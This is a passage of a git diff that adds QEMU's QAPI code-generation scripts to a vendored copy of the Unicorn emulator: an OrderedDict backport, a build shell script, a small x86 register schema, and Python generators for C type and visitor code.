IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. + +try: + from UserDict import UserDict + from UserDict import DictMixin +except ImportError: + from collections import UserDict + try: + from collections import MutableMapping as DictMixin + except ImportError: + from collections.abc import MutableMapping as DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.__map = {} # key --> [key, prev, next] + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = reversed(self).next() + else: + key = iter(self).next() + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + 
return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, self.items()) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + if len(self) != len(other): + return False + for p, q in zip(self.items(), other.items()): + if p != q: + return False + return True + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-build.sh b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-build.sh new file mode 100644 index 0000000..0cf5502 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-build.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +# Run this scripts to create qapi below files in root dir +# ../qapi-types.c +# ../qapi-types.h +# ../qapi-visit.c +# ../qapi-visit.h + +python qapi-types.py -h -o .. -b -i qapi-schema.json +python qapi-types.py -c -o .. -b -i qapi-schema.json + +python qapi-visit.py -h -o .. -b -i qapi-schema.json +python qapi-visit.py -c -o .. 
-b -i qapi-schema.json + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-schema.json b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-schema.json new file mode 100644 index 0000000..37e5315 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-schema.json @@ -0,0 +1,39 @@ +# -*- Mode: Python -*- +# +# QAPI Schema + +# QAPI common definitions +{ 'include': 'qapi/common.json' } + +## +# @X86CPURegister32 +# +# A X86 32-bit register +# +# Since: 1.5 +## +{ 'enum': 'X86CPURegister32', + 'data': [ 'EAX', 'EBX', 'ECX', 'EDX', 'ESP', 'EBP', 'ESI', 'EDI' ] } + +## +# @X86CPUFeatureWordInfo +# +# Information about a X86 CPU feature word +# +# @cpuid-input-eax: Input EAX value for CPUID instruction for that feature word +# +# @cpuid-input-ecx: #optional Input ECX value for CPUID instruction for that +# feature word +# +# @cpuid-register: Output register containing the feature bits +# +# @features: value of output register, containing the feature bits +# +# Since: 1.5 +## +{ 'type': 'X86CPUFeatureWordInfo', + 'data': { 'cpuid-input-eax': 'int', + '*cpuid-input-ecx': 'int', + 'cpuid-register': 'X86CPURegister32', + 'features': 'int' } } + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-types.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-types.py new file mode 100644 index 0000000..7b06085 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-types.py @@ -0,0 +1,464 @@ +# +# QAPI types generator +# +# Copyright IBM, Corp. 2011 +# +# Authors: +# Anthony Liguori +# +# This work is licensed under the terms of the GNU GPL, version 2. +# See the COPYING file in the top-level directory. 
+ +from ordereddict import OrderedDict +from qapi import * +import sys +import os +import getopt +import errno + +def generate_fwd_struct(name, members, builtin_type=False): + if builtin_type: + return mcgen(''' + +typedef struct %(name)sList +{ + union { + %(type)s value; + uint64_t padding; + }; + struct %(name)sList *next; +} %(name)sList; +''', + type=c_type(name), + name=name) + + return mcgen(''' + +typedef struct %(name)s %(name)s; + +typedef struct %(name)sList +{ + union { + %(name)s *value; + uint64_t padding; + }; + struct %(name)sList *next; +} %(name)sList; +''', + name=name) + +def generate_fwd_enum_struct(name, members): + return mcgen(''' +typedef struct %(name)sList +{ + union { + %(name)s value; + uint64_t padding; + }; + struct %(name)sList *next; +} %(name)sList; +''', + name=name) + +def generate_struct_fields(members): + ret = '' + + for argname, argentry, optional, structured in parse_args(members): + if optional: + ret += mcgen(''' + bool has_%(c_name)s; +''', + c_name=c_var(argname)) + if structured: + push_indent() + ret += generate_struct({ "field": argname, "data": argentry}) + pop_indent() + else: + ret += mcgen(''' + %(c_type)s %(c_name)s; +''', + c_type=c_type(argentry), c_name=c_var(argname)) + + return ret + +def generate_struct(expr): + + structname = expr.get('type', "") + fieldname = expr.get('field', "") + members = expr['data'] + base = expr.get('base') + + ret = mcgen(''' +struct %(name)s +{ +''', + name=structname) + + if base: + ret += generate_struct_fields({'base': base}) + + ret += generate_struct_fields(members) + + if len(fieldname): + fieldname = " " + fieldname + ret += mcgen(''' +}%(field)s; +''', + field=fieldname) + + return ret + +def generate_enum_lookup(name, values): + ret = mcgen(''' +const char *%(name)s_lookup[] = { +''', + name=name) + i = 0 + for value in values: + ret += mcgen(''' + "%(value)s", +''', + value=value) + + ret += mcgen(''' + NULL, +}; + +''') + return ret + +def generate_enum(name, values): 
+ lookup_decl = mcgen(''' +extern const char *%(name)s_lookup[]; +''', + name=name) + + enum_decl = mcgen(''' +typedef enum %(name)s +{ +''', + name=name) + + # append automatically generated _MAX value + enum_values = values + [ 'MAX' ] + + i = 0 + for value in enum_values: + enum_full_value = generate_enum_full_value(name, value) + enum_decl += mcgen(''' + %(enum_full_value)s = %(i)d, +''', + enum_full_value = enum_full_value, + i=i) + i += 1 + + enum_decl += mcgen(''' +} %(name)s; +''', + name=name) + + return lookup_decl + enum_decl + +def generate_anon_union_qtypes(expr): + + name = expr['union'] + members = expr['data'] + + ret = mcgen(''' +const int %(name)s_qtypes[QTYPE_MAX] = { +''', + name=name) + + for key in members: + qapi_type = members[key] + if qapi_type in builtin_type_qtypes: + qtype = builtin_type_qtypes[qapi_type] + elif find_struct(qapi_type): + qtype = "QTYPE_QDICT" + elif find_union(qapi_type): + qtype = "QTYPE_QDICT" + elif find_enum(qapi_type): + qtype = "QTYPE_QSTRING" + else: + assert False, "Invalid anonymous union member" + + ret += mcgen(''' + [ %(qtype)s ] = %(abbrev)s_KIND_%(enum)s, +''', + qtype = qtype, + abbrev = de_camel_case(name).upper(), + enum = c_fun(de_camel_case(key),False).upper()) + + ret += mcgen(''' +}; +''') + return ret + + +def generate_union(expr): + + name = expr['union'] + typeinfo = expr['data'] + + base = expr.get('base') + discriminator = expr.get('discriminator') + + enum_define = discriminator_find_enum_define(expr) + if enum_define: + discriminator_type_name = enum_define['enum_name'] + else: + discriminator_type_name = '%sKind' % (name) + + ret = mcgen(''' +struct %(name)s +{ + %(discriminator_type_name)s kind; + union { + void *data; +''', + name=name, + discriminator_type_name=discriminator_type_name) + + for key in typeinfo: + ret += mcgen(''' + %(c_type)s %(c_name)s; +''', + c_type=c_type(typeinfo[key]), + c_name=c_fun(key)) + + ret += mcgen(''' + }; +''') + + if base: + base_fields = 
find_struct(base)['data'] + if discriminator: + base_fields = base_fields.copy() + del base_fields[discriminator] + ret += generate_struct_fields(base_fields) + else: + assert not discriminator + + ret += mcgen(''' +}; +''') + if discriminator == {}: + ret += mcgen(''' +extern const int %(name)s_qtypes[]; +''', + name=name) + + + return ret + +def generate_type_cleanup_decl(name): + ret = mcgen(''' +void qapi_free_%(type)s(%(c_type)s obj); +''', + c_type=c_type(name),type=name) + return ret + +def generate_type_cleanup(name): + ret = mcgen(''' + +void qapi_free_%(type)s(%(c_type)s obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_%(type)s(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} +''', + c_type=c_type(name),type=name) + return ret + + +try: + opts, args = getopt.gnu_getopt(sys.argv[1:], "chbp:i:o:", + ["source", "header", "builtins", + "prefix=", "input-file=", "output-dir="]) +except getopt.GetoptError as err: + print(str(err)) + sys.exit(1) + +output_dir = "" +input_file = "" +prefix = "" +c_file = 'qapi-types.c' +h_file = 'qapi-types.h' + +do_c = False +do_h = False +do_builtins = False + +for o, a in opts: + if o in ("-p", "--prefix"): + prefix = a + elif o in ("-i", "--input-file"): + input_file = a + elif o in ("-o", "--output-dir"): + output_dir = a + "/" + elif o in ("-c", "--source"): + do_c = True + elif o in ("-h", "--header"): + do_h = True + elif o in ("-b", "--builtins"): + do_builtins = True + +if not do_c and not do_h: + do_c = True + do_h = True + +c_file = output_dir + prefix + c_file +h_file = output_dir + prefix + h_file + +try: + os.makedirs(output_dir) +except os.error as e: + if e.errno != errno.EEXIST: + raise + +def maybe_open(really, name, opt): + if really: + return open(name, opt) + else: + try: + import StringIO + return StringIO.StringIO() + except ImportError: + from io import StringIO + return 
StringIO() + +fdef = maybe_open(do_c, c_file, 'w') +fdecl = maybe_open(do_h, h_file, 'w') + +fdef.write(mcgen(''' +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * deallocation functions for schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * Michael Roth + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/dealloc-visitor.h" +#include "%(prefix)sqapi-types.h" +#include "%(prefix)sqapi-visit.h" + +''', prefix=prefix)) + +fdecl.write(mcgen(''' +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef %(guard)s +#define %(guard)s + +#include "unicorn/platform.h" + +''', + guard=guardname(h_file))) + +exprs = parse_schema(input_file) +exprs = filter(lambda expr: 'gen' not in expr, exprs) +exprs = list(exprs) + +fdecl.write(guardstart("QAPI_TYPES_BUILTIN_STRUCT_DECL")) +for typename in builtin_types: + fdecl.write(generate_fwd_struct(typename, None, builtin_type=True)) +fdecl.write(guardend("QAPI_TYPES_BUILTIN_STRUCT_DECL")) + +for expr in exprs: + ret = "\n" + if 'type' in expr: + ret += generate_fwd_struct(expr['type'], expr['data']) + elif 'enum' in expr: + ret += generate_enum(expr['enum'], expr['data']) + "\n" + ret += generate_fwd_enum_struct(expr['enum'], expr['data']) + fdef.write(generate_enum_lookup(expr['enum'], expr['data'])) + elif 'union' in expr: + ret += generate_fwd_struct(expr['union'], expr['data']) + "\n" + enum_define = discriminator_find_enum_define(expr) + if not enum_define: + ret += generate_enum('%sKind' % expr['union'], expr['data'].keys()) + fdef.write(generate_enum_lookup('%sKind' % expr['union'], + expr['data'].keys())) 
+ if expr.get('discriminator') == {}: + fdef.write(generate_anon_union_qtypes(expr)) + else: + continue + fdecl.write(ret) + +# to avoid header dependency hell, we always generate declarations +# for built-in types in our header files and simply guard them +fdecl.write(guardstart("QAPI_TYPES_BUILTIN_CLEANUP_DECL")) +for typename in builtin_types: + fdecl.write(generate_type_cleanup_decl(typename + "List")) +fdecl.write(guardend("QAPI_TYPES_BUILTIN_CLEANUP_DECL")) + +# ...this doesn't work for cases where we link in multiple objects that +# have the functions defined, so we use -b option to provide control +# over these cases +if do_builtins: + fdef.write(guardstart("QAPI_TYPES_BUILTIN_CLEANUP_DEF")) + for typename in builtin_types: + fdef.write(generate_type_cleanup(typename + "List")) + fdef.write(guardend("QAPI_TYPES_BUILTIN_CLEANUP_DEF")) + +for expr in exprs: + ret = "\n" + if 'type' in expr: + ret += generate_struct(expr) + "\n" + ret += generate_type_cleanup_decl(expr['type'] + "List") + fdef.write(generate_type_cleanup(expr['type'] + "List") + "\n") + ret += generate_type_cleanup_decl(expr['type']) + fdef.write(generate_type_cleanup(expr['type']) + "\n") + elif 'union' in expr: + ret += generate_union(expr) + ret += generate_type_cleanup_decl(expr['union'] + "List") + fdef.write(generate_type_cleanup(expr['union'] + "List") + "\n") + ret += generate_type_cleanup_decl(expr['union']) + fdef.write(generate_type_cleanup(expr['union']) + "\n") + elif 'enum' in expr: + ret += generate_type_cleanup_decl(expr['enum'] + "List") + fdef.write(generate_type_cleanup(expr['enum'] + "List") + "\n") + else: + continue + fdecl.write(ret) + +fdecl.write(''' +#endif +''') + +fdecl.flush() +fdecl.close() + +fdef.flush() +fdef.close() diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-visit.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-visit.py new file mode 100644 index 0000000..beb5af5 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-visit.py @@ -0,0 +1,597 @@ +# +# QAPI visitor generator +# +# Copyright IBM, Corp. 2011 +# Copyright (C) 2014 Red Hat, Inc. +# +# Authors: +# Anthony Liguori +# Michael Roth +# Markus Armbruster +# +# This work is licensed under the terms of the GNU GPL, version 2. +# See the COPYING file in the top-level directory. + +from ordereddict import OrderedDict +from qapi import * +import re +import sys +import os +import getopt +import errno + +implicit_structs = [] + +def generate_visit_implicit_struct(type): + global implicit_structs + if type in implicit_structs: + return '' + implicit_structs.append(type) + return mcgen(''' + +static void visit_type_implicit_%(c_type)s(Visitor *m, %(c_type)s **obj, Error **errp) +{ + Error *err = NULL; + + visit_start_implicit_struct(m, (void **)obj, sizeof(%(c_type)s), &err); + if (!err) { + visit_type_%(c_type)s_fields(m, obj, errp); + visit_end_implicit_struct(m, &err); + } + error_propagate(errp, err); +} +''', + c_type=type_name(type)) + +def generate_visit_struct_fields(name, field_prefix, fn_prefix, members, base = None): + substructs = [] + ret = '' + if not fn_prefix: + full_name = name + else: + full_name = "%s_%s" % (name, fn_prefix) + + for argname, argentry, optional, structured in parse_args(members): + if structured: + if not fn_prefix: + nested_fn_prefix = argname + else: + nested_fn_prefix = "%s_%s" % (fn_prefix, argname) + + nested_field_prefix = "%s%s." 
% (field_prefix, argname) + ret += generate_visit_struct_fields(name, nested_field_prefix, + nested_fn_prefix, argentry) + ret += mcgen(''' + +static void visit_type_%(full_name)s_field_%(c_name)s(Visitor *m, %(name)s **obj, Error **errp) +{ +''', + name=name, full_name=full_name, c_name=c_var(argname)) + ret += generate_visit_struct_body(full_name, argname, argentry) + ret += mcgen(''' +} +''') + + if base: + ret += generate_visit_implicit_struct(base) + + ret += mcgen(''' + +static void visit_type_%(full_name)s_fields(Visitor *m, %(name)s **obj, Error **errp) +{ + Error *err = NULL; +''', + name=name, full_name=full_name) + push_indent() + + if base: + ret += mcgen(''' +visit_type_implicit_%(type)s(m, &(*obj)->%(c_prefix)s%(c_name)s, &err); +if (err) { + goto out; +} +''', + c_prefix=c_var(field_prefix), + type=type_name(base), c_name=c_var('base')) + + for argname, argentry, optional, structured in parse_args(members): + if optional: + ret += mcgen(''' +visit_optional(m, &(*obj)->%(c_prefix)shas_%(c_name)s, "%(name)s", &err); +if (!err && (*obj)->%(prefix)shas_%(c_name)s) { +''', + c_prefix=c_var(field_prefix), prefix=field_prefix, + c_name=c_var(argname), name=argname) + push_indent() + + if structured: + ret += mcgen(''' +visit_type_%(full_name)s_field_%(c_name)s(m, obj, &err); +''', + full_name=full_name, c_name=c_var(argname)) + else: + ret += mcgen(''' +visit_type_%(type)s(m, &(*obj)->%(c_prefix)s%(c_name)s, "%(name)s", &err); +''', + c_prefix=c_var(field_prefix), prefix=field_prefix, + type=type_name(argentry), c_name=c_var(argname), + name=argname) + + if optional: + pop_indent() + ret += mcgen(''' +} +''') + ret += mcgen(''' +if (err) { + goto out; +} +''') + + pop_indent() + if re.search('^ *goto out\\;', ret, re.MULTILINE): + ret += mcgen(''' + +out: +''') + ret += mcgen(''' + error_propagate(errp, err); +} +''') + return ret + + +def generate_visit_struct_body(field_prefix, name, members): + ret = mcgen(''' + Error *err = NULL; + +''') + + if not 
field_prefix: + full_name = name + else: + full_name = "%s_%s" % (field_prefix, name) + + if len(field_prefix): + ret += mcgen(''' + visit_start_struct(m, NULL, "", "%(name)s", 0, &err); +''', + name=name) + else: + ret += mcgen(''' + visit_start_struct(m, (void **)obj, "%(name)s", name, sizeof(%(name)s), &err); +''', + name=name) + + ret += mcgen(''' + if (!err) { + if (*obj) { + visit_type_%(name)s_fields(m, obj, errp); + } + visit_end_struct(m, &err); + } + error_propagate(errp, err); +''', + name=full_name) + + return ret + +def generate_visit_struct(expr): + + name = expr['type'] + members = expr['data'] + base = expr.get('base') + + ret = generate_visit_struct_fields(name, "", "", members, base) + + ret += mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp) +{ +''', + name=name) + + ret += generate_visit_struct_body("", name, members) + + ret += mcgen(''' +} +''') + return ret + +def generate_visit_list(name, members): + return mcgen(''' + +void visit_type_%(name)sList(Visitor *m, %(name)sList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + %(name)sList *native_i = (%(name)sList *)i; + visit_type_%(name)s(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} +''', + name=name) + +def generate_visit_enum(name, members): + return mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, %(name)s_lookup, "%(name)s", name, errp); +} +''', + name=name) + +def generate_visit_anon_union(name, members): + ret = mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + 
visit_start_implicit_struct(m, (void**) obj, sizeof(%(name)s), &err); + if (err) { + goto out; + } + visit_get_next_type(m, (int*) &(*obj)->kind, %(name)s_qtypes, name, &err); + if (err) { + goto out_end; + } + switch ((*obj)->kind) { +''', + name=name) + + # For anon union, always use the default enum type automatically generated + # as "'%sKind' % (name)" + disc_type = '%sKind' % (name) + + for key in members: + assert (members[key] in builtin_types + or find_struct(members[key]) + or find_union(members[key]) + or find_enum(members[key])), "Invalid anonymous union member" + + enum_full_value = generate_enum_full_value(disc_type, key) + ret += mcgen(''' + case %(enum_full_value)s: + visit_type_%(c_type)s(m, &(*obj)->%(c_name)s, name, &err); + break; +''', + enum_full_value = enum_full_value, + c_type = type_name(members[key]), + c_name = c_fun(key)) + + ret += mcgen(''' + default: + abort(); + } +out_end: + error_propagate(errp, err); + err = NULL; + visit_end_implicit_struct(m, &err); +out: + error_propagate(errp, err); +} +''') + + return ret + + +def generate_visit_union(expr): + + name = expr['union'] + members = expr['data'] + + base = expr.get('base') + discriminator = expr.get('discriminator') + + if discriminator == {}: + assert not base + return generate_visit_anon_union(name, members) + + enum_define = discriminator_find_enum_define(expr) + if enum_define: + # Use the enum type as discriminator + ret = "" + disc_type = enum_define['enum_name'] + else: + # There will always be a discriminator in the C switch code, by default it + # is an enum type generated silently as "'%sKind' % (name)" + ret = generate_visit_enum('%sKind' % name, members.keys()) + disc_type = '%sKind' % (name) + + if base: + base_fields = find_struct(base)['data'] + if discriminator: + base_fields = base_fields.copy() + del base_fields[discriminator] + ret += generate_visit_struct_fields(name, "", "", base_fields) + + if discriminator: + for key in members: + ret += 
generate_visit_implicit_struct(members[key]) + + ret += mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_struct(m, (void **)obj, "%(name)s", name, sizeof(%(name)s), &err); + if (err) { + goto out; + } + if (*obj) { +''', + name=name) + + if base: + ret += mcgen(''' + visit_type_%(name)s_fields(m, obj, &err); + if (err) { + goto out_obj; + } +''', + name=name) + + if not discriminator: + disc_key = "type" + else: + disc_key = discriminator + ret += mcgen(''' + visit_type_%(disc_type)s(m, &(*obj)->kind, "%(disc_key)s", &err); + if (err) { + goto out_obj; + } + if (!visit_start_union(m, !!(*obj)->data, &err) || err) { + goto out_obj; + } + switch ((*obj)->kind) { +''', + disc_type = disc_type, + disc_key = disc_key) + + for key in members: + if not discriminator: + fmt = 'visit_type_%(c_type)s(m, &(*obj)->%(c_name)s, "data", &err);' + else: + fmt = 'visit_type_implicit_%(c_type)s(m, &(*obj)->%(c_name)s, &err);' + + enum_full_value = generate_enum_full_value(disc_type, key) + ret += mcgen(''' + case %(enum_full_value)s: + ''' + fmt + ''' + break; +''', + enum_full_value = enum_full_value, + c_type=type_name(members[key]), + c_name=c_fun(key)) + + ret += mcgen(''' + default: + abort(); + } +out_obj: + error_propagate(errp, err); + err = NULL; + visit_end_union(m, !!(*obj)->data, &err); + error_propagate(errp, err); + err = NULL; + } + visit_end_struct(m, &err); +out: + error_propagate(errp, err); +} +''') + + return ret + +def generate_declaration(name, members, genlist=True, builtin_type=False): + ret = "" + if not builtin_type: + ret += mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp); +''', + name=name) + + if genlist: + ret += mcgen(''' +void visit_type_%(name)sList(Visitor *m, %(name)sList **obj, const char *name, Error **errp); +''', + name=name) + + return ret + +def generate_enum_declaration(name, members, genlist=True): + ret 
= "" + if genlist: + ret += mcgen(''' +void visit_type_%(name)sList(Visitor *m, %(name)sList **obj, const char *name, Error **errp); +''', + name=name) + + return ret + +def generate_decl_enum(name, members, genlist=True): + return mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s *obj, const char *name, Error **errp); +''', + name=name) + +try: + opts, args = getopt.gnu_getopt(sys.argv[1:], "chbp:i:o:", + ["source", "header", "builtins", "prefix=", + "input-file=", "output-dir="]) +except getopt.GetoptError as err: + print(str(err)) + sys.exit(1) + +input_file = "" +output_dir = "" +prefix = "" +c_file = 'qapi-visit.c' +h_file = 'qapi-visit.h' + +do_c = False +do_h = False +do_builtins = False + +for o, a in opts: + if o in ("-p", "--prefix"): + prefix = a + elif o in ("-i", "--input-file"): + input_file = a + elif o in ("-o", "--output-dir"): + output_dir = a + "/" + elif o in ("-c", "--source"): + do_c = True + elif o in ("-h", "--header"): + do_h = True + elif o in ("-b", "--builtins"): + do_builtins = True + +if not do_c and not do_h: + do_c = True + do_h = True + +c_file = output_dir + prefix + c_file +h_file = output_dir + prefix + h_file + +try: + os.makedirs(output_dir) +except os.error as e: + if e.errno != errno.EEXIST: + raise + +def maybe_open(really, name, opt): + if really: + return open(name, opt) + else: + try: + import StringIO + return StringIO.StringIO() + except ImportError: + from io import StringIO + return StringIO() + +fdef = maybe_open(do_c, c_file, 'w') +fdecl = maybe_open(do_h, h_file, 'w') + +fdef.write(mcgen(''' +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qemu-common.h" +#include "%(header)s" +''', + header=basename(h_file))) + +fdecl.write(mcgen(''' +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef %(guard)s +#define %(guard)s + +#include "qapi/visitor.h" +#include "%(prefix)sqapi-types.h" + +''', + prefix=prefix, guard=guardname(h_file))) + +exprs = parse_schema(input_file) + +# to avoid header dependency hell, we always generate declarations +# for built-in types in our header files and simply guard them +fdecl.write(guardstart("QAPI_VISIT_BUILTIN_VISITOR_DECL")) +for typename in builtin_types: + fdecl.write(generate_declaration(typename, None, genlist=True, + builtin_type=True)) +fdecl.write(guardend("QAPI_VISIT_BUILTIN_VISITOR_DECL")) + +# ...this doesn't work for cases where we link in multiple objects that +# have the functions defined, so we use -b option to provide control +# over these cases +if do_builtins: + for typename in builtin_types: + fdef.write(generate_visit_list(typename, None)) + +for expr in exprs: + if 'type' in expr: + ret = generate_visit_struct(expr) + ret += generate_visit_list(expr['type'], expr['data']) + fdef.write(ret) + + ret = generate_declaration(expr['type'], expr['data']) + fdecl.write(ret) + elif 'union' in expr: + ret = generate_visit_union(expr) + ret += generate_visit_list(expr['union'], expr['data']) + fdef.write(ret) + + enum_define = discriminator_find_enum_define(expr) + ret = "" + if not enum_define: + ret = generate_decl_enum('%sKind' % expr['union'], + expr['data'].keys()) + ret += generate_declaration(expr['union'], expr['data']) + fdecl.write(ret) + elif 'enum' in expr: + ret = generate_visit_list(expr['enum'], expr['data']) + ret += 
generate_visit_enum(expr['enum'], expr['data']) + fdef.write(ret) + + ret = generate_decl_enum(expr['enum'], expr['data']) + ret += generate_enum_declaration(expr['enum'], expr['data']) + fdecl.write(ret) + +fdecl.write(''' +#endif +''') + +fdecl.flush() +fdecl.close() + +fdef.flush() +fdef.close() diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi.py new file mode 100644 index 0000000..429f211 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi.py @@ -0,0 +1,605 @@ +# +# QAPI helper library +# +# Copyright IBM, Corp. 2011 +# Copyright (c) 2013 Red Hat Inc. +# +# Authors: +# Anthony Liguori +# Markus Armbruster +# +# This work is licensed under the terms of the GNU GPL, version 2. +# See the COPYING file in the top-level directory. + +import re +from ordereddict import OrderedDict +import os +import sys + +try: + basestring +except NameError: + basestring = str + +builtin_types = [ + 'str', 'int', 'number', 'bool', + 'int8', 'int16', 'int32', 'int64', + 'uint8', 'uint16', 'uint32', 'uint64' +] + +builtin_type_qtypes = { + 'str': 'QTYPE_QSTRING', + 'int': 'QTYPE_QINT', + 'number': 'QTYPE_QFLOAT', + 'bool': 'QTYPE_QBOOL', + 'int8': 'QTYPE_QINT', + 'int16': 'QTYPE_QINT', + 'int32': 'QTYPE_QINT', + 'int64': 'QTYPE_QINT', + 'uint8': 'QTYPE_QINT', + 'uint16': 'QTYPE_QINT', + 'uint32': 'QTYPE_QINT', + 'uint64': 'QTYPE_QINT', +} + +def error_path(parent): + res = "" + while parent: + res = ("In file included from %s:%d:\n" % (parent['file'], + parent['line'])) + res + parent = parent['parent'] + return res + +class QAPISchemaError(Exception): + def __init__(self, schema, msg): + self.input_file = schema.input_file + self.msg = msg + self.col = 1 + self.line = schema.line + for ch in schema.src[schema.line_pos:schema.pos]: + if ch == '\t': + self.col = (self.col + 7) % 8 + 1 + else: + self.col += 1 + self.info = schema.parent_info + + def __str__(self): + return 
error_path(self.info) + \ + "%s:%d:%d: %s" % (self.input_file, self.line, self.col, self.msg) + +class QAPIExprError(Exception): + def __init__(self, expr_info, msg): + self.info = expr_info + self.msg = msg + + def __str__(self): + return error_path(self.info['parent']) + \ + "%s:%d: %s" % (self.info['file'], self.info['line'], self.msg) + +class QAPISchema: + + def __init__(self, fp, input_relname=None, include_hist=[], + previously_included=[], parent_info=None): + """ include_hist is a stack used to detect inclusion cycles + previously_included is a global state used to avoid multiple + inclusions of the same file""" + input_fname = os.path.abspath(fp.name) + if input_relname is None: + input_relname = fp.name + self.input_dir = os.path.dirname(input_fname) + self.input_file = input_relname + self.include_hist = include_hist + [(input_relname, input_fname)] + previously_included.append(input_fname) + self.parent_info = parent_info + self.src = fp.read() + if self.src == '' or self.src[-1] != '\n': + self.src += '\n' + self.cursor = 0 + self.line = 1 + self.line_pos = 0 + self.exprs = [] + self.accept() + + while self.tok != None: + expr_info = {'file': input_relname, 'line': self.line, 'parent': self.parent_info} + expr = self.get_expr(False) + if isinstance(expr, dict) and "include" in expr: + if len(expr) != 1: + raise QAPIExprError(expr_info, "Invalid 'include' directive") + include = expr["include"] + if not isinstance(include, str): + raise QAPIExprError(expr_info, + 'Expected a file name (string), got: %s' + % include) + include_path = os.path.join(self.input_dir, include) + for elem in self.include_hist: + if include_path == elem[1]: + raise QAPIExprError(expr_info, "Inclusion loop for %s" + % include) + # skip multiple include of the same file + if include_path in previously_included: + continue + try: + fobj = open(include_path, 'r') + except IOError as e: + raise QAPIExprError(expr_info, + '%s: 